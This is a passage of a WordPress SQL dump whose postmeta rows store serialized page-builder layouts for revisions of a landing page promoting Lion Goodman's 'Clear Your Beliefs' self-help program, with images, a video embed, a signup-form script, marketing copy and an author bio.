Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1078, 1570, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:491:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1080, 1572, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:502:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;"><div><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1079, 1571, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282066" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:626:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center> [/su_box]\n\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 